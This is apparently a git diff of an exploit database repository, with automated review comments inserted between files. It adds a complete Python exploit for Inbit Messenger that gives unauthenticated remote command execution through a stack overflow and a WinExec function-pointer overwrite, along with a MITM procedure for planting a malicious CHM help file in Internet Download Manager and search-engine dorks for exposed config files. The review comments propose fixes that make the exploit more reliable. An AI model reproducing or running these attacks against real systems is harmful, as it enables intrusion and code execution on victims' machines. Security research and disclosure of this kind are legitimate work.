parser.add_argument('-p', '--port', help='target port', type=int, required=False, default=10883) + args = parser.parse_args() + # define logger + logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO') + logging.SUCCESS = logging.CRITICAL + 1 + logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m') + logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m') + logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m') + logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m') + logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args) + # print banner + print(BANNER) + # run exploit + exploit(args.target, args.port) \ No newline at end of file diff --git a/exploits/windows/remote/51127.py b/exploits/windows/remote/51127.py new file mode 100755 index 000000000..4db60b85f --- /dev/null +++ b/exploits/windows/remote/51127.py 
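Review bot: `exploit()` calls `logging.success("DONE")`, but that attribute only exists because the `__main__` block monkey-patches it onto the `logging` module after `logging.SUCCESS = logging.CRITICAL + 1`; importing the module or calling `exploit()` from anywhere else raises `AttributeError`, and patching a stdlib module is fragile style in any case. Define a module-level logger and helper instead, e.g. `SUCCESS = logging.CRITICAL + 1`, `logger = logging.getLogger(__name__)`, `def success(msg): logger.log(SUCCESS, msg)`, and move the `addLevelName` calls to module scope. The socket in `exploit()` is not closed if `connect` or `send` raises; `with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:` handles that. 51127.py repeats the same `logging.success` pattern in both `getWinExecAddress()` and `exploit()`, and its bare `except:` around the `int(...)` build-number parse should be `except ValueError:`.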
@@ -0,0 +1,121 @@ +# Exploit Title: Inbit Messenger v4.9.0 - Unauthenticated Remote Command Execution (RCE) +# Date: 11/08/2022 +# Exploit Author: a-rey +# Vendor Homepage: http://www.inbit.com/support.html +# Software Link: http://www.softsea.com/review/Inbit-Messenger-Basic-Edition.html +# Version: v4.6.0 - v4.9.0 +# Tested on: Windows XP SP3, Windows 7, Windows 10, Windows Server 2019 +# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Inbit_Messenger/v4.6.0/writeup.md + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +import sys, socket, struct, string, argparse, logging + +BANNER = """\033[0m\033[1;35m +╔══════════════════════════════════════════════════════════════════════════╗ +║\033[0m Inbit Messenger v4.6.0 - v4.9.0 Unauthenticated Remote Command Execution \033[1;35m║ +╚══════════════════════════════════════════════════════════════════════════╝\033[0m + by: \033[1;36m █████╗ ██████╗ ███████╗██╗ ██╗ + \033[1;36m██╔══██╗ ██╔══██╗██╔════╝██║ ██║ + \033[1;36m███████║ ███ ██████╔╝█████╗ ██╗ ██═╝ + \033[1;36m██╔══██║ ██╔══██╗██╔══╝ ██╔╝ + \033[1;36m██║ ██║ ██║ ██║███████╗ ██║ + \033[1;36m╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ +\033[0m""" + +# NOTE: IAT addresses for KERNEL32!WinExec in IMS.EXE by build number +TARGETS = { + 4601 : 0x005f3360, + 4801 : 0x005f7364, + 4901 : 0x005f7364, +} + +# NOTE: min and max values for length of command +CMD_MIN_LEN = 10 +CMD_MAX_LEN = 0xfc64 + +# NOTE: these bytes cannot be in the calculated address of WinExec to ensure overflow +BAD_BYTES = b"\x3e" # > + +def getWinExecAddress(targetIp:str, targetPort:int) -> bytes: + # NOTE: send packet with client build number of 4601 for v4.6.0 + pkt = b"<50><0>7146011\x00" + logging.info(f"trying to get version information from {targetIp}:{targetPort} ...") + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((targetIp, targetPort)) + s.send(pkt) + _d = s.recv(1024) + # find build tag in response + if b'' not in _d: + logging.error(f"invalid version packet 
received: {_d}") + sys.exit(-1) + s.close() + try: + build = int(_d[_d.index(b'') + 3:_d.index(b'')]) + except: + logging.error(f"failed to parse build number from packet: {_d}") + sys.exit(-1) + # get the IAT offset + if build not in TARGETS.keys(): + logging.error(f"unexpected build number: {build}") + sys.exit(-1) + # NOTE: we need to subtract 0x38 since the vulnerable instruction is 'CALL [EAX + 0x38]' + winexec = struct.pack(" None: + # NOTE: command must be NULL terminated + command += b"\x00" + # check user command length + if len(command) < CMD_MIN_LEN: + logging.error(f"command length must be at least {CMD_MIN_LEN} characters") + sys.exit(-1) + if len(command) >= CMD_MAX_LEN: + logging.error(f"command length must be less than {CMD_MAX_LEN} characters") + sys.exit(-1) + # get WinExec address + winexec = getWinExecAddress(targetIp, targetPort) + # get a string representation of the length of the command data after the <> tag parsed by atol() + pktLen = str(len(command)) + pkt = b"<" # start of XML tag/stack overflow + pkt += pktLen.encode() # number parsed by atol() & length of command data following '>' character + pkt += b"\x00" # NULL terminator to force atol to ignore what comes next + # NOTE: adjust the 85 byte offset calculated that assumes a 2 byte string passed to atol() + pkt += (b"A" * (85 - (len(pktLen) - 2))) # padding up to function pointer overwrite + pkt += winexec # indirect function pointer we control + pkt += b">" # end of XML tag/stack overflow + pkt += command # the command set to the call to WinExec() + logging.info(f"sending payload to {targetIp}:{targetPort} ...") + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((targetIp, targetPort)) + s.send(pkt) + s.close() + logging.success("DONE") + +if __name__ == '__main__': + # parse arguments + parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER) + parser.add_argument('-t', '--target', help='target IP', type=str, 
required=True) + parser.add_argument('-c', '--command', help='command to run', type=str, required=True) + parser.add_argument('-p', '--port', help='target port', type=int, required=False, default=10883) + args = parser.parse_args() + # define logger + logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO') + logging.SUCCESS = logging.CRITICAL + 1 + logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m') + logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m') + logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m') + logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m') + logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args) + # print banner + print(BANNER) + # run exploit + exploit(args.target, args.port, args.command.encode()) \ No newline at end of file diff --git a/exploits/windows/remote/51131.txt b/exploits/windows/remote/51131.txt new file mode 100644 index 000000000..105ad3d98 --- /dev/null +++ b/exploits/windows/remote/51131.txt 
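Review bot: BAD_BYTES is declared with a comment saying the packed WinExec address must not contain 0x3e, yet exploit() never checks the value returned by getWinExecAddress() against it, whereas the companion SEH exploit loops over the whole packet before sending. The three current TARGETS entries minus 0x38 contain no 0x3e byte, so this is latent today, but any build added to the table later silently bypasses the stated constraint; add `if any(b in BAD_BYTES for b in winexec): logging.error("bad byte in WinExec address"); sys.exit(-1)` directly after the `winexec = getWinExecAddress(targetIp, targetPort)` line. Separately, the version probe does a single blocking `s.recv(1024)` on a socket with no timeout, so a filtered port or a service that never answers hangs the script indefinitely, and a short read is reported as "invalid version packet" rather than retried; `s.settimeout(10)` before connect() would at least bound the wait. The build-tag markers in getWinExecAddress appear tag-stripped in this view (`b'' not in _d`), so the exact tag bytes could not be verified here.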
@@ -0,0 +1,43 @@
+# Exploit Title: Internet Download Manager v6.41 Build 3 - Remote Code Execution (RCE)
+# Date: 15.11.2022
+# Exploit Author: M. Akil Gündoğan
+# Contact: https://twitter.com/akilgundogan
+# Vendor Homepage: https://www.internetdownloadmanager.com/
+# Software Link: https://mirror2.internetdownloadmanager.com/idman641build3.exe?v=lt&filename=idman641build3.exe
+# Version: v.6.41 Build 3
+# Tested on: Windows 10 Professional x64
+# PoC Video: https://youtu.be/0djlanUbfY4
+
+Vulnerabiliy Description:
+---------------------------------------
+Some help files are missing in non-English versions of Internet Download Manager. Help files with the extension
+".chm" prepared in the language used are downloaded from the internet and run, and displayed to users. This download is
+done over HTTP, which is an insecure protocol. An attacker on the local network can spoof traffic with a MITM attack and
+replaces ".chm" help files with malicious ".chm" files. IDM runs ".chm" files automatically after downloading.
+This allows the attacker to execute code remotely.
+
+It also uses HTTP for checking and downloading updates by IDM. The attacker can send fake updates as if the victim has a new update to the system.
+
+Since we preferred to use Turkish IDM, our target address in the MITM attack was "http://www.internetdownloadmanager.com/languages/tut_tr.chm".
+
+Requirements:
+---------------------------------------
+The attacker and the victim must be on the same local network.
+The victim using the computer must have a user account with administrative privileges on the system. The attacker does not need to have administrator privileges!
+
+Step by step produce:
+---------------------------------------
+1 - The attacker prepares a malicious CHM file. You can read the article at "https://sevenlayers.com/index.php/316-malicious-chm" for that.
+2 - A MITM attack is made against the target using Ettercap or Bettercap.
+3 - Let's redirect the domains "internetdownloadmanager.com" and "*.internetdownloadmanager.com" to our attacker machine with DNS spoofing.
+4 - A web server is run on the attacking machine and the languages directory is created and the malicious ".chm" file with the
+ same name (tut_tr.chm / the file according to which language you are using.) is placed in it.
+5 - When the victim opens Internet Download Manager and clicks on the "Tutorials" button, the download will start and our malicious ".chm" file will run automatically when it's finished.
+
+Advisories:
+---------------------------------------
+Developers should stop using insecure HTTP in their update and download modules. In addition, every downloaded file
+should not be run automatically, additional warning messages should be displayed for users.
+
+Special thanks: p4rs, ratio, blackcode, zeyd.can and all friends.
+---------------------------------------
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index d80561a27..b600b9df7 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
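Review bot: The Requirements section states the victim must hold an administrative account, but nothing in steps 1–5 explains why: the spoofed CHM is run by IDM when the Tutorials button is clicked, presumably in the victim's own session, so the write-up should say what the admin rights are needed for (impact rather than execution) or drop the requirement. The claim that update checking also runs over HTTP and that fake updates can be pushed is asserted but not exercised by the PoC, which only substitutes `languages/tut_tr.chm`; either add the observed update URL and a step for it, or mark it as untested. Two heading typos, `Vulnerabiliy Description` and `Step by step produce`, should read `Vulnerability Description` and `Step by step procedure`.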
@@ -3518,6 +3518,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 17422,exploits/hardware/remote/17422.txt,"DreamBox DM800 - Arbitrary File Download",2011-06-21,ShellVision,remote,hardware,,2011-06-21,2011-07-24,1,OSVDB-73430;CVE-2011-4716,,,,,
 18079,exploits/hardware/remote/18079.pl,"DreamBox DM800 1.5rc1 - File Disclosure",2011-11-04,"Todor Donev",remote,hardware,,2011-11-04,2016-12-05,0,CVE-2011-4716;OSVDB-73430,,,,,
 48214,exploits/hardware/remote/48214.py,"Drobo 5N2 4.1.1 - Remote Command Injection",2020-03-13,"Ian Sindermann",remote,hardware,,2020-03-13,2020-03-13,0,,,,,,
+51129,exploits/hardware/remote/51129.txt,"DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure",2023-03-29,"Aryan Chehreghani",remote,hardware,,2023-03-29,2023-03-29,0,,,,,,
 45283,exploits/hardware/remote/45283.rb,"Eaton Xpert Meter 13.4.0.10 - SSH Private Key Disclosure",2018-08-29,BrianWGray,remote,hardware,,2018-08-29,2018-08-29,0,,,,,,
 47888,exploits/hardware/remote/47888.py,"EBBISLAND EBBSHAVE 6100-09-04-1441 - Remote Buffer Overflow",2020-01-08,hantwister,remote,hardware,,2020-01-08,2020-01-08,0,CVE-2017-3623,,,,,
 28888,exploits/hardware/remote/28888.txt,"ECI Telecom B-Focus ADSL2+ Combo332+ Wireless Router - Information Disclosure",2006-10-31,LegendaryZion,remote,hardware,,2006-10-31,2013-10-12,1,CVE-2006-5711;OSVDB-30193,,,,,https://www.securityfocus.com/bid/20834/info
@@ -4830,6 +4831,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48247,exploits/hardware/webapps/48247.py,"UCM6202 1.0.18.13 - Remote Command Injection",2020-03-24,"Jacob Baines",webapps,hardware,,2020-03-24,2020-03-24,0,CVE-2020-5722,,,,,
 29312,exploits/hardware/webapps/29312.txt,"Unicorn Router WB-3300NR - Cross-Site Request Forgery (Factory Reset/DNS Change)",2013-10-30,absane,webapps,hardware,,2013-11-06,2013-11-06,0,OSVDB-99224,,,,,
 42150,exploits/hardware/webapps/42150.py,"Uniview NVR - Password Disclosure",2017-06-09,B1t,webapps,hardware,,2017-06-11,2017-10-03,0,,,,,,
+51130,exploits/hardware/webapps/51130.txt,"Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting (XSS)",2023-03-29,"Bleron Rrustemi",webapps,hardware,,2023-03-29,2023-03-29,0,,,,,,
 30358,exploits/hardware/webapps/30358.txt,"UPC Ireland Cisco EPC 2425 Router / Horizon Box - WPA-PSK Handshake Information",2013-12-16,"Matt O'Connor",webapps,hardware,,2013-12-16,2017-11-15,0,CVE-2013-7136;OSVDB-101192,,,,,http://www.planitcomputing.ie/upc-wifi-attack.pdf
 24517,exploits/hardware/webapps/24517.txt,"USB Sharp 1.3.4 iPad iPhone - Multiple Vulnerabilities",2013-02-18,Vulnerability-Lab,webapps,hardware,,2013-02-18,2013-02-18,0,OSVDB-90332;OSVDB-90331,,,,,https://www.vulnerability-lab.com/get_content.php?id=873
 42739,exploits/hardware/webapps/42739.txt,"UTStar WA3002G4 ADSL Broadband Modem - Authentication Bypass",2017-09-15,"Gem George",webapps,hardware,,2017-09-18,2017-09-18,0,CVE-2017-14243,,,,,
@@ -14801,6 +14803,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 17709,exploits/php/webapps/17709.txt,"Bonza Digital Cart Script - SQL Injection",2011-08-22,"Eyup CELIK",webapps,php,,2011-08-22,2011-08-22,1,,,,,,
 5722,exploits/php/webapps/5722.txt,"Booby 1.0.1 - Multiple Remote File Inclusions",2008-06-02,HaiHui,webapps,php,,2008-06-01,2016-12-07,1,OSVDB-46333;CVE-2008-2645;OSVDB-46332;OSVDB-46331;OSVDB-46330;OSVDB-46329;OSVDB-46328;OSVDB-46327;OSVDB-46326,,,,http://www.exploit-db.combooby-1.0.1-12_May_2005.tar.gz,
 12749,exploits/php/webapps/12749.txt,"Book Gallery - 'aboutbook.php' SQL Injection",2010-05-26,Mr.P3rfekT,webapps,php,,2010-05-25,,1,,,,,,
+51123,exploits/php/webapps/51123.txt,"Book Store Management System 1.0.0 - Stored Cross-Site Scripting (XSS)",2023-03-29,"Rajeshwar Singh",webapps,php,,2023-03-29,2023-03-29,0,,,,,,
 46486,exploits/php/webapps/46486.rb,"Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit)",2019-03-04,AkkuS,webapps,php,80,2019-03-04,2019-03-06,0,CVE-2019-9581,"Metasploit Framework (MSF)",,,http://www.exploit-db.combooked-2.7.5.zip,
 50594,exploits/php/webapps/50594.py,"Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated)",2021-12-14,0sunday,webapps,php,,2021-12-14,2021-12-14,0,CVE-2019-9581,,,,,
 48428,exploits/php/webapps/48428.txt,"Booked Scheduler 2.7.7 - Authenticated Directory Traversal",2020-05-06,Besim,webapps,php,,2020-05-06,2020-05-06,0,,,,,,
@@ -19136,6 +19139,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34608,exploits/php/webapps/34608.txt,"HeffnerCMS 1.22 - 'index.php' Local File Inclusion",2010-09-06,"MiND C0re",webapps,php,,2010-09-06,2014-09-10,1,,,,,,https://www.securityfocus.com/bid/43006/info
 30734,exploits/php/webapps/30734.txt,"Helios Calendar 1.1/1.2 - 'admin/index.php' Cross-Site Scripting",2007-11-02,"Ivan Sanchez",webapps,php,,2007-11-02,2014-01-06,1,CVE-2007-5952;OSVDB-38408,,,,,https://www.securityfocus.com/bid/26312/info
 30293,exploits/php/webapps/30293.txt,"Helma 1.5.3 - Search Script Cross-Site Scripting",2007-07-12,"Hanno Boeck",webapps,php,,2007-07-12,2013-12-15,1,CVE-2007-3693;OSVDB-36872,,,,,https://www.securityfocus.com/bid/24880/info
+51132,exploits/php/webapps/51132.txt,"Helmet Store Showroom v1.0 - SQL Injection",2023-03-29,"Ameer Hamza",webapps,php,,2023-03-29,2023-03-29,0,,,,,,
 26502,exploits/php/webapps/26502.txt,"Help Center Live 1.0/1.2/2.0 - 'module.php' Local File Inclusion",2005-11-14,"HACKERS PAL",webapps,php,,2005-11-14,2013-07-01,1,CVE-2005-3639;OSVDB-20861,,,,,https://www.securityfocus.com/bid/15404/info
 12421,exploits/php/webapps/12421.txt,"Help Center Live 2.0.6 - 'module=helpcenter&file=' Local File Inclusion",2010-04-27,41.w4r10r,webapps,php,,2010-04-26,,1,OSVDB-64103;CVE-2010-1652,,,,,
 28315,exploits/php/webapps/28315.txt,"Help Center Live 2.1.2 - 'module.php' Directory Traversal",2006-07-31,Dr.GooGle,webapps,php,,2006-07-31,2013-09-16,1,OSVDB-28285,,,,,https://www.securityfocus.com/bid/19256/info
@@ -19347,6 +19351,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34412,exploits/php/webapps/34412.txt,"Hulihan Applications BXR 0.6.8 - SQL Injection / HTML Injection",2010-08-05,"High-Tech Bridge SA",webapps,php,,2010-08-05,2014-08-26,1,CVE-2010-4963;OSVDB-67054,,,,,https://www.securityfocus.com/bid/42247/info
 49854,exploits/php/webapps/49854.txt,"Human Resource Information System 0.1 - 'First Name' Persistent Cross-Site Scripting (Authenticated)",2021-05-10,"Reza Afsahi",webapps,php,,2021-05-10,2021-05-10,0,,,,,,
 49847,exploits/php/webapps/49847.py,"Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)",2021-05-07,"Reza Afsahi",webapps,php,,2021-05-07,2021-05-07,0,,,,,,
+51125,exploits/php/webapps/51125.txt,"Human Resource Management System 1.0 - SQL Injection (unauthenticated)",2023-03-29,"Matthijs van der Vaart (eMVee)",webapps,php,,2023-03-29,2023-03-29,0,,,,,,
 51047,exploits/php/webapps/51047.txt,"Human Resources Management System v1.0 - Multiple SQLi",2023-03-25,"Abdulhakim Öner",webapps,php,,2023-03-25,2023-03-25,0,,,,,,
 9494,exploits/php/webapps/9494.txt,"humanCMS - Authentication Bypass",2009-08-24,next,webapps,php,,2009-08-23,,1,,,,,,
 35511,exploits/php/webapps/35511.txt,"Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-12-10,"Jos Wetzels_ Emiel Florijn",webapps,php,,2014-12-10,2014-12-10,0,OSVDB-115638;OSVDB-115637;OSVDB-115636,,,,,
@@ -28370,6 +28375,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43312,exploits/php/webapps/43312.txt,"Resume Clone Script 2.0.5 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,,2017-12-11,2017-12-13,1,CVE-2017-17641,,,,,
 49353,exploits/php/webapps/49353.txt,"Resumes Management and Job Application Website 1.0 - Authentication Bypass",2021-01-05,"Kshitiz Raj",webapps,php,,2021-01-05,2021-10-28,0,,,,,,
 49380,exploits/php/webapps/49380.txt,"Resumes Management and Job Application Website 1.0 - RCE (Unauthenticated)",2021-01-06,"Arnav Tripathy",webapps,php,,2021-01-06,2021-10-11,0,,,,,,
+51133,exploits/php/webapps/51133.py,"Revenue Collection System v1.0 - Remote Code Execution (RCE)",2023-03-29,"Joe Pollock",webapps,php,,2023-03-29,2023-03-29,0,,,,,,
 43821,exploits/php/webapps/43821.txt,"ReviewPost < 2.84 - Multiple Vulnerabilities",2015-01-02,"GulfTech Security",webapps,php,,2018-01-19,2018-01-19,0,GTSA-00060;CVE-2005-0270;CVE-2005-0271;CVE-2005-0272,,,,,http://gulftech.org/advisories/ReviewPost%20Multiple%20Vulnerabilities/60
 41939,exploits/php/webapps/41939.txt,"Revive Ad Server 4.0.1 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-26,"Cyril Vallicari",webapps,php,,2017-04-26,2017-04-26,0,,,,,http://www.exploit-db.comrevive-adserver-4.0.1.zip,
 47739,exploits/php/webapps/47739.php,"Revive Adserver 4.2 - Remote Code Execution",2019-12-03,crlf,webapps,php,,2019-12-03,2019-12-03,0,CVE-2019-5434,,,,http://www.exploit-db.comrevive-adserver-4.2.0.tar.gz,
@@ -33442,6 +33448,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34432,exploits/php/webapps/34432.txt,"Wowd - 'index.html' Multiple Cross-Site Scripting Vulnerabilities",2009-10-29,Lostmon,webapps,php,,2009-10-29,2014-08-27,1,,,,,,https://www.securityfocus.com/bid/42327/info
 49657,exploits/php/webapps/49657.txt,"WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection",2021-03-17,securityforeveryone.com,webapps,php,,2021-03-17,2021-03-17,0,,,,,,
 49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",2021-06-11,securityforeveryone.com,webapps,php,,2021-06-11,2021-06-11,0,,,,,,
+51122,exploits/php/webapps/51122.py,"WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)",2023-03-29,AkuCyberSec,webapps,php,,2023-03-29,2023-03-29,0,CVE-2022-1565,,,,,
 47419,exploits/php/webapps/47419.txt,"WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting",2019-09-25,strider,webapps,php,,2019-09-25,2019-09-25,0,,,,,,
 39678,exploits/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross-Site Request Forgery",2016-04-11,hyp3rlinx,webapps,php,80,2016-04-11,2016-04-11,0,,,,,,http://hyp3rlinx.altervista.org/advisories/WPNXM-CSRF.txt
 51075,exploits/php/webapps/51075.txt,"WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities",2023-03-27,"Rafael Pedrero",webapps,php,,2023-03-27,2023-03-27,0,,,,,,
@@ -40589,6 +40596,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 15626,exploits/windows/local/15626.py,"OtsTurntables 1.00.048 - '.m3u'/'.ofl' Local Buffer Overflow (SEH)",2010-11-28,0v3r,local,windows,,2010-11-28,2010-11-28,1,,,,http://www.exploit-db.com/screenshots/idlt16000/screen-shot-2010-11-28-at-74353-am.png,http://www.exploit-db.comotsturntablesfreesetup.exe,
 11475,exploits/windows/local/11475.py,"OtsTurntables Free 1.00.047 - '.olf' Universal Buffer Overflow",2010-02-16,mr_me,local,windows,,2010-02-15,,1,,,,,http://www.exploit-db.comotsturntablesfreesetup.exe,
 48414,exploits/windows/local/48414.txt,"Outline Service 1.3.3 - 'Outline Service ' Unquoted Service Path",2020-05-04,"Minh Tuan",local,windows,,2020-05-04,2020-05-04,0,,,,,,
+51128,exploits/windows/local/51128.txt,"Outline V1.6.0 - Unquoted Service Path",2023-03-29,"Milad karimi",local,windows,,2023-03-29,2023-03-29,0,,,,,,
 21096,exploits/windows/local/21096.txt,"Outlook Express 6 - Attachment Security Bypass",2001-08-30,http-equiv,local,windows,,2001-08-30,2012-09-10,1,OSVDB-11941,,,,,https://www.securityfocus.com/bid/3271/info
 29465,exploits/windows/local/29465.txt,"Outpost Firewall PRO 4.0 - Local Privilege Escalation",2007-01-15,"Matousec Transparent security",local,windows,,2007-01-15,2013-11-12,1,CVE-2007-0333;OSVDB-33480,,,,http://www.exploit-db.comoutpost_firewall_pro_v4.0_build_1005.590.123.zip,https://www.securityfocus.com/bid/22069/info
 47658,exploits/windows/local/47658.txt,"oXygen XML Editor 21.1.1 - XML External Entity Injection",2019-11-14,"Pablo Santiago",local,windows,,2019-11-14,2019-11-14,0,,,,,,
@@ -42650,6 +42658,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 12244,exploits/windows/remote/12244.txt,"iMesh 7.1.0.x - 'IMWeb.dll 7.0.0.x' Remote Heap Overflow",2007-12-18,rgod,remote,windows,,2007-12-17,,1,CVE-2007-6493;OSVDB-40239,,,,,
 30939,exploits/windows/remote/30939.txt,"ImgSvr 0.6.21 - Error Message Remote Script Execution",2007-12-26,anonymous,remote,windows,,2007-12-26,2014-01-15,1,,,,,,https://www.securityfocus.com/bid/27033/info
 37611,exploits/windows/remote/37611.php,"Impero Education Pro - System Remote Command Execution",2015-07-14,slipstream,remote,windows,,2015-07-14,2015-07-14,0,OSVDB-124655;OSVDB-124654,,,,,
+51127,exploits/windows/remote/51127.py,"Inbit Messenger v4.9.0 - Unauthenticated Remote Command Execution (RCE)",2023-03-29,a-rey,remote,windows,,2023-03-29,2023-03-29,0,,,,,,
+51126,exploits/windows/remote/51126.py,"Inbit Messenger v4.9.0 - Unauthenticated Remote SEH Overflow",2023-03-29,a-rey,remote,windows,,2023-03-29,2023-03-29,0,,,,,,
 8284,exploits/windows/remote/8284.pl,"IncrediMail 5.86 - Cross-Site Scripting Script Execution",2009-03-24,"Bui Quang Minh",remote,windows,,2009-03-23,,1,,,,,,
 3877,exploits/windows/remote/3877.html,"IncrediMail IMMenuShellExt - ActiveX Control Buffer Overflow",2007-05-08,"Umesh Wanve",remote,windows,,2007-05-07,,1,OSVDB-34331;CVE-2007-1683,,,,,
 28853,exploits/windows/remote/28853.html,"Indusoft Thin Client 7.1 - ActiveX Buffer Overflow",2013-10-10,blake,remote,windows,,2013-10-10,2013-10-10,0,OSVDB-98333,,,,,
@@ -42677,6 +42687,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40984,exploits/windows/remote/40984.py,"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)",2017-01-02,"Fady Mohammed Osman",remote,windows,,2017-01-02,2017-01-02,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2017-01-02-at-165012.png,http://www.exploit-db.comidasetup.exe,
 37668,exploits/windows/remote/37668.php,"Internet Download Manager - OLE Automation Array Remote Code Execution",2015-07-21,"Mohammad Reza Espargham",remote,windows,,2015-07-21,2015-07-21,0,CVE-2014-6332,,,,,
 32465,exploits/windows/remote/32465.pl,"Internet Download Manager 4.0.5 - File Parsing Buffer Overflow",2008-10-06,Ciph3r,remote,windows,,2008-10-06,2014-03-24,1,CVE-2008-4508;OSVDB-49030,,,,,https://www.securityfocus.com/bid/31603/info
+51131,exploits/windows/remote/51131.txt,"Internet Download Manager v6.41 Build 3 - Remote Code Execution (RCE)",2023-03-29,"M. Akil Gündoğan",remote,windows,,2023-03-29,2023-03-29,0,,,,,,
 19922,exploits/windows/remote/19922.pl,"Internet Security Systems ICECap Manager 2.0.23 - Default Username and Password",2000-05-17,"rain forest puppy",remote,windows,,2000-05-17,2012-07-18,1,CVE-2000-0350;OSVDB-312,,,,,https://www.securityfocus.com/bid/1216/info
 23847,exploits/windows/remote/23847.c,"Internet Security Systems Protocol Analysis Module ICQ - Parsing Buffer Overflow",2004-03-26,Sam,remote,windows,,2004-03-26,2013-01-03,1,,,,,,https://www.securityfocus.com/bid/9913/info
 20934,exploits/windows/remote/20934.txt,"Internet Software Solutions Air Messenger LAN Server 3.4.2 - Full Path Disclosure",2001-06-18,"SNS Research",remote,windows,,2001-06-18,2012-08-30,1,CVE-2001-0788;OSVDB-13973,,,,,https://www.securityfocus.com/bid/2881/info
diff --git a/ghdb.xml b/ghdb.xml
index e416e2fd1..8e2f00043 100644
--- a/ghdb.xml
+++ b/ghdb.xml
@@ -33946,6 +33946,21 @@ ManhNho 2018-05-29 ManhNho + + 8129 + https://www.exploit-db.com/ghdb/8129 + Files Containing Juicy Info + BroadBand Device Webserver + # Google Dork: BroadBand Device Webserver +# Files Containing Juicy Info +# Date:29/03/2023 +# Exploit Author: Shx + BroadBand Device Webserver + https://www.google.com/search?q=BroadBand Device Webserver + + 2023-03-29 + Shx + 4740 https://www.exploit-db.com/ghdb/4740 @@ -40414,6 +40429,21 @@ Information about user data is obtained 2021-11-12 Reza Abasi + + 8131 + https://www.exploit-db.com/ghdb/8131 + Files Containing Juicy Info + intitle:"index of "application.yml" + # Google Dork: intitle:"index of "application.yml" +# Files Containing Juicy Info +# Date:29/03/2023 +# Exploit Author: Suman Das + intitle:"index of "application.yml" + https://www.google.com/search?q=intitle:"index of "application.yml" + + 2023-03-29 + Suman Das + 7959 https://www.exploit-db.com/ghdb/7959 @@ -40429,6 +40459,21 @@ Information about user data is obtained 2022-06-29 Suman Das + + 8128 + https://www.exploit-db.com/ghdb/8128 + Files Containing Juicy Info + intitle:"index of "conf.json" + # Google Dork: intitle:"index of "conf.json" +# Files Containing Juicy Info +# Date:29/03/2023 +# Exploit Author: Suman Das + intitle:"index of "conf.json" + https://www.google.com/search?q=intitle:"index of "conf.json" + + 2023-03-29 + Suman Das + 7947 https://www.exploit-db.com/ghdb/7947 @@ -47725,6 +47770,21 @@ Author: Abhinav Porwal 2021-10-04 Asif Mohammad Khan + + 8130 + https://www.exploit-db.com/ghdb/8130 + Files Containing Juicy Info + intitle:index of django/admin site:.* + # Google Dork: intitle:index of django/admin site:.* +# Files Containing Juicy Info +# Date:29/03/2023 +# Exploit Author: Md rofikul + intitle:index of django/admin site:.* + https://www.google.com/search?q=intitle:index of django/admin site:.* + + 2023-03-29 + Md rofikul + 7827 https://www.exploit-db.com/ghdb/7827 
